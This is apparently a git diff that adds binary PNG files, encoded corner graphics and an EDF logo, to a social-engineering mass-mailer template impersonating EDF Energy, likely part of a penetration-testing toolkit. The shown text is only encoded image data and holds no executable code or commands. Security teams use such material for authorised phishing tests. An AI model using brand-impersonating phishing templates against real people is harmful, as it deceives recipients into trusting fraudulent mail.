znmErguCO)gXi>B;la@}TYTqC?Q=}fK*v_IGkVV?Lyu1yo0qMP>tI-?JZK@KAmXk2q
z*X0)9veiJ#Oj$`}6Id#gqHZ(c^Y(wNLnv$|DyXCii29OiA2~VtJ20kdw50V6s2NA8
z{0XcYr95n2krj`#0onCS0g7z`qy?o?!F1gbHSL35f-Prs9R_JsVrYGc1OyElMb(GA
z_IRlfQHg^cdzfwa*Tz!mDxpA2uVIL~huW<6da1&Q`bvbu!Bvo0S2nX8=Y?=?Kt_w+
zOOwDep)TVtl|0Qwl|$EZp`HOu@8rFp)qM$ctFQ$*$R<Z?Y4_073L1b3{{O)B_Gnpc
Rw;lih002ovPDHLkV1hU2vY-F}

literal 0
HcmV?d00001

diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/corner-bl.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/corner-bl.png
new file mode 100644
index 0000000000000000000000000000000000000000..5debaa2d79410d0b98f9477f1184d7ffada5617e
GIT binary patch
literal 2902
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
AivR!s

literal 0
HcmV?d00001

diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/corner-br.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/corner-br.png
new file mode 100644
index 0000000000000000000000000000000000000000..86dda3cdb39b579a31d0c216fe1dce9467d035c2
GIT binary patch
literal 2893
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

literal 0
HcmV?d00001

diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/corner-tl.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/corner-tl.png
new file mode 100644
index 0000000000000000000000000000000000000000..002941299e671a00a1422edacb02938b014d5aa1
GIT binary patch
literal 2900
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

literal 0
HcmV?d00001

diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/edf_logo.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/edf_logo.png
new file mode 100644
index 0000000000000000000000000000000000000000..dc45131c0a208fd5b6fee5de25f07723d052d1e0
GIT binary patch
literal 6982
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
